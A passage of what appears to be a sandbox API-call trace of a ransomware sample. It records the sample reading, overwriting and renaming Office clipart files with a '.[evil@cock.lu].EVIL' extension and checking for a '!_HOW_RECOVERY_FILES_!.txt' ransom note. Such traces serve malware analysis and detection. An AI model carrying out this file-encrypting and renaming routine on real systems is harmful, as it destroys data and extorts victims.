nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12c0, lpOverlapped=0x0) returned 1 [0154.483] CloseHandle (hObject=0x1a8) returned 1 [0154.483] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.484] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.484] __uncaught_exception () returned 0x84b1160800 [0154.484] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.484] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293800.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293800.wmf.[evil@cock.lu].evil")) returned 1 [0154.485] ??_V@YAXPEAX@Z () returned 0x1 [0154.488] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF", dwFileAttributes=0x200) returned 0 [0154.488] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.488] wcsstr (_Str="J0293832.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.488] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF") returned 69 [0154.488] wcscmp (_String1="J0293832.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.488] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0293832.WMF") returned 0x0 [0154.488] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF") returned 0x45 [0154.488] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293832.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.490] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x17be, lpOverlapped=0x0) returned 1 [0154.502] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.502] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.502] _errno () returned 0x84b1160840 [0154.502] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.502] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17c0, lpOverlapped=0x0) returned 1 [0154.502] CloseHandle (hObject=0x1a8) returned 1 [0154.503] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.503] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.503] __uncaught_exception () returned 0x84b1160800 [0154.503] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.503] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293832.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293832.wmf.[evil@cock.lu].evil")) returned 1 [0154.504] ??_V@YAXPEAX@Z () returned 0x1 [0154.507] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF", dwFileAttributes=0x200) returned 0 [0154.508] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.508] wcsstr (_Str="J0294989.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.508] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF") returned 69 [0154.508] wcscmp (_String1="J0294989.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.508] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0294989.WMF") returned 0x0 [0154.508] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF") returned 0x45 [0154.508] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294989.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.511] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x37de, lpOverlapped=0x0) returned 1 [0154.520] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.520] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.520] _errno () returned 0x84b1160840 [0154.520] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.520] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x37e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x37e0, lpOverlapped=0x0) returned 1 [0154.521] CloseHandle (hObject=0x1a8) returned 1 [0154.521] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.521] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.521] __uncaught_exception () returned 0x84b1160800 [0154.521] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.521] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294989.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294989.wmf.[evil@cock.lu].evil")) returned 1 [0154.522] ??_V@YAXPEAX@Z () returned 0x1 [0154.526] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF", dwFileAttributes=0x200) returned 0 [0154.526] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.526] wcsstr (_Str="J0294991.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.526] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF") returned 69 [0154.526] wcscmp (_String1="J0294991.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.526] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0294991.WMF") returned 0x0 [0154.526] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF") returned 0x45 [0154.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294991.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.528] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6180, lpOverlapped=0x0) returned 1 [0154.538] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.538] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.538] _errno () returned 0x84b1160840 [0154.538] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.538] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x61a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x61a0, lpOverlapped=0x0) returned 1 [0154.538] CloseHandle (hObject=0x1a8) returned 1 [0154.538] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.539] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.539] __uncaught_exception () returned 0x84b1160800 [0154.539] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.539] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294991.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294991.wmf.[evil@cock.lu].evil")) returned 1 [0154.540] ??_V@YAXPEAX@Z () returned 0x1 [0154.543] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF", dwFileAttributes=0x200) returned 0 [0154.543] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.544] wcsstr (_Str="J0295069.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.544] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF") returned 69 [0154.544] wcscmp (_String1="J0295069.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.544] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0295069.WMF") returned 0x0 [0154.544] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF") returned 0x45 [0154.544] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0295069.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.546] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x21b2, lpOverlapped=0x0) returned 1 [0154.555] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.555] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.555] _errno () returned 0x84b1160840 [0154.555] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.555] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x21c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x21c0, lpOverlapped=0x0) returned 1 [0154.555] CloseHandle (hObject=0x1a8) returned 1 [0154.555] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.556] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.556] __uncaught_exception () returned 0x84b1160800 [0154.556] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.556] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0295069.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0295069.wmf.[evil@cock.lu].evil")) returned 1 [0154.557] ??_V@YAXPEAX@Z () returned 0x1 [0154.560] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF", dwFileAttributes=0x200) returned 0 [0154.560] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.561] wcsstr (_Str="J0296277.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.561] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF") returned 69 [0154.561] wcscmp (_String1="J0296277.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.561] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0296277.WMF") returned 0x0 [0154.561] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF") returned 0x45 [0154.561] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296277.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.563] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe42c, lpOverlapped=0x0) returned 1 [0154.572] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.572] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.572] _errno () returned 0x84b1160840 [0154.572] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.572] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xe440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe440, lpOverlapped=0x0) returned 1 [0154.572] CloseHandle (hObject=0x1a8) returned 1 [0154.573] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.573] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.573] __uncaught_exception () returned 0x84b1160800 [0154.573] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.573] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296277.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296277.wmf.[evil@cock.lu].evil")) returned 1 [0154.575] ??_V@YAXPEAX@Z () returned 0x1 [0154.578] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF", dwFileAttributes=0x200) returned 0 [0154.578] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.578] wcsstr (_Str="J0296279.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.578] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF") returned 69 [0154.578] wcscmp (_String1="J0296279.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.578] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0296279.WMF") returned 0x0 [0154.578] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF") returned 0x45 [0154.578] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296279.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.580] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1088e, lpOverlapped=0x0) returned 1 [0154.587] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.587] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.587] _errno () returned 0x84b1160840 [0154.588] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.588] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x108a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x108a0, lpOverlapped=0x0) returned 1 [0154.588] CloseHandle (hObject=0x1a8) returned 1 [0154.588] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.588] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.589] __uncaught_exception () returned 0x84b1160800 [0154.589] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.589] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296279.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296279.wmf.[evil@cock.lu].evil")) returned 1 [0154.590] ??_V@YAXPEAX@Z () returned 0x1 [0154.594] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF", dwFileAttributes=0x200) returned 0 [0154.594] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.594] wcsstr (_Str="J0296288.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.594] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF") returned 69 [0154.594] wcscmp (_String1="J0296288.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.594] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0296288.WMF") returned 0x0 [0154.594] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF") returned 0x45 [0154.594] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296288.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.597] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x107ec, lpOverlapped=0x0) returned 1 [0154.610] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.610] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.610] _errno () returned 0x84b1160840 [0154.610] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.610] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x10800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10800, lpOverlapped=0x0) returned 1 [0154.610] CloseHandle (hObject=0x1a8) returned 1 [0154.610] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.611] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.611] __uncaught_exception () returned 0x84b1160800 [0154.611] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.611] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296288.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296288.wmf.[evil@cock.lu].evil")) returned 1 [0154.612] ??_V@YAXPEAX@Z () returned 0x1 [0154.616] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF", dwFileAttributes=0x200) returned 0 [0154.616] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.616] wcsstr (_Str="J0297229.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.616] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF") returned 69 [0154.616] wcscmp (_String1="J0297229.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.616] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0297229.WMF") returned 0x0 [0154.616] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF") returned 0x45 [0154.616] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297229.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.618] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x59ce, lpOverlapped=0x0) returned 1 [0154.628] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.628] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.628] _errno () returned 0x84b1160840 [0154.628] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.628] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x59e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x59e0, lpOverlapped=0x0) returned 1 [0154.628] CloseHandle (hObject=0x1a8) returned 1 [0154.628] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.629] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.629] __uncaught_exception () returned 